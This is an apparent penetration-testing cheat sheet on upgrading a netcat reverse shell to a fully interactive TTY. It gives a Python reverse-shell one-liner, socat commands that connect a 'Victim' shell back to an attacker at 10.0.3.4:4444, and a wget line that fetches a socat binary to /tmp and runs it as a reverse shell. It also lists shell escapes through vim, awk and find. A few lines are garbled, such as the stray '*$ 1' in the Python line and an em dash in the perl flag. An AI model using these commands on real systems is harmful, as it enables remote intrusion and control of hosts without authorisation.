Upgrading shell

Netcat is a great tool, but it also has its shortcoming -

• Hitting “Ctrl-C”, for instance, drops the entire shell instead of canceling the current command as on a regular terminal shell;

• You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts;

• Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively);

• Features like job control, tab complete and command history with the up-arrow are also missing.

To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.

Different PTY modules

Python pty module

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),   *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

perl —e 'exec "/bin/sh";'

Using socat

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If not download in Victim:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Other ways

/bin/sh -i
echo os.system('/bin/bash')
exec "/bin/sh";

Related Shell Escape Sequences

Vi / Vim

:!bash

:set shell=/bin/bash
:shell

awk

awk 'BEGIN {system("/bin/bash")}'

find

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \

Netcat Magic

1.First spawn a PTY shell with python or with bash ,

python -c 'import pty; pty.spawn("/bin/bash")'

2. Background the process with Ctrl-z

3. Examine the current terminal and STTY info so we can force the connected shell to match it:

stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

The information needed is the size of the current TTY (“Example: rows 38; columns 116”)

4. With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command:

stty raw -echo

With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed.

5. Next foreground the shell with fg. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with enter button

6. After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above)

$ export SHELL=bash

$ export TERM=xterm256-color

$ stty rows 38 columns 116

The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :)

Obtaining a full interactive shell with zsh

Current kali terminal come with zsh shell so it's important to learn this method as above will not work with zsh shell

1.Get tty shell with above commands and then background the process with ctrl+z

2. Get the number of rows and columns with

stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

3. To ignore hotkeys in the local shell and return to your reverse shell, enter

stty raw -echo; fg
# Note: For zsh users it is important to enter this in one line!

4. Configure your rows and columns

stty rows <ROWS> cols <COLS>

5. Export term

export TERM=xterm-256color

6. All you need to do now, is reload your shell:

exec /bin/bash